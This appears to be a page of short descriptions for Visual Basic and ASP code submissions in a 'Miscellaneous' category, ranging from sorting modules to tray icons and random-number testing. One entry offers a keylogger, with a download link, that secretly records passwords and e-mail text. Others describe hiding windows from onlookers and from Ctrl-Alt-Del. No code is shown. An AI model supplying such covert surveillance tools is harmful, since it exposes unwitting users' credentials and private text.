Results for "Category: Miscellaneous"
This program provides you with four popular sorting functions. The Bubble Sort, the Shaker Sort (Also know as cocktail Sort), the Shell Sort and finially the Quick Sort. The program also allows you to test all four functions agenst each other, to show what ones are the fastest. Each sort function is placed in its own module so you can simply throw it right into whatever programs you may need it for. Obviously I have not created any of these functions, all have been written in VB6 with help from various C++ code and various pseudocode. More information on each function can be found on sites such as Wikipedi, which has example code for some functions. P.S. There is actually a program contained with this example called "Generate List". This will allow you to generate a list of any size in no time. Such as the 30,000 item list i used in my screenshot.
System tray module with high resolution icon (Windows XP), balloon (with or without sound) and mouse event support for icon and balloon. Credits in the zip file.
Module to easily pin (or stick) and unpin an application to and from Windows' desktop. It will work with "Active Desktop" on or off and with "Show desktop icons" on or off too. The WinKey+D or WinKey+M won't minimize the pinned application. Tested only in Windows XP. Last update: added unpin sub.
Use the Visual Basic 6 SP6 dependency module with MSI Factory 2.0 Software installation to generate file installation MSI for Visual Basic 6 SP6.
One line code to display: 1 Display Control panel 2 View the display settings 3 Display Mouse settings 4 Display the Keyboard settings 5 Display Modem settings 6 Display Printer settings 7 Display time/date settings Reposted from : "Stringer" (jstringer@fsmail.net)
To Remove Your Yahoo! ID off another persons List and the ability to Remove them from Your List Yahoo! serverside using the YMSG protocol. (Been old this does not work anymore - update 2008)
Same as my other reverse border submision but i added code to flip task bar back to standard position and make reversed dialog border standard dialog window.
My code will create a border style on runrime, and it can reverse the borders it can edit the border styles of any app if you get its handle. ive showed it rversing the taskbar as well I never found this code any where else I serached for months so finally I just Wrote my own code to do this so if you use it plz give me some feed back!
Download from "www.chandu.i8.com/hackkey.html"! Readme.txt first! You can find out the text what was typed on keyboard! (It secretly store data in to a file )! ****** Now Know what others typed in system like Documents, files,e-mail text,ofcourse e-mail id's and passwords everything that had been pressed on your system's Keyboard . My program finds pressed keys and stores them in a file.it also has password fecility, so every one cannot open the application while runing.It also changes the file if text file exceed 600KB. Its very useful to know what others typed on system. This code is simply for knowing what others typed on your system. Its intended to give basic information but not to do harmful things. I Wonn't be responsable for any of your mis-use of my code,use it! Try it ans use this code in your own way or modify it!
This small asp script is mainly coded for those webmasters having trouble to choose colors to be used in their web site. Giving some parameters will be result in variying color cubes. ***Please do VOTE if you like this code.
This may help some of you that have a need to perform mass compiles using Visual BASIC 6.0
A couple of tools to make your programming life a little easier.
Generating random numbers does not always produce the results you desire. Numbers that appear to be random may not be truely random. To test random numbers, use a DOS application named Diehard. Read "Using Diehard.pdf" included with this submission and the documentation within this code. Links to Diehard are within the source code. === 02-May-2012 Updated clsRandom module.
Build table files that can be used with my kiCrypto demo application posted on PSC. These tables can be used with GOST, Skipjack cipher algorithms and Whirlpool hash algorithm for that added security. ==== 15-Jun-2012 Updated documentation and support modules.
This is to inform you of another update available from Microsoft for Visual Basic 6.0
this is basically a simple class which will handle the pagination.
This is simple NO API send data to an inactive MdiChild code, just using a timer...
First of all this code is very simple, just ideal for beginer users, but anyone can use it. This code is used for undo and redo functions for a simple TextBox or RichTextBox
I made this to hide programs/windows that were currently open when my parents walked in. It has memory so you just press F6 to hide everything you have selected. Very useful for quickly hiding things. There will be a new version comming out soon, with the following features: Hides a hWnd from Control Alt Delete when you choose to hide the window, cleaer code and new functions.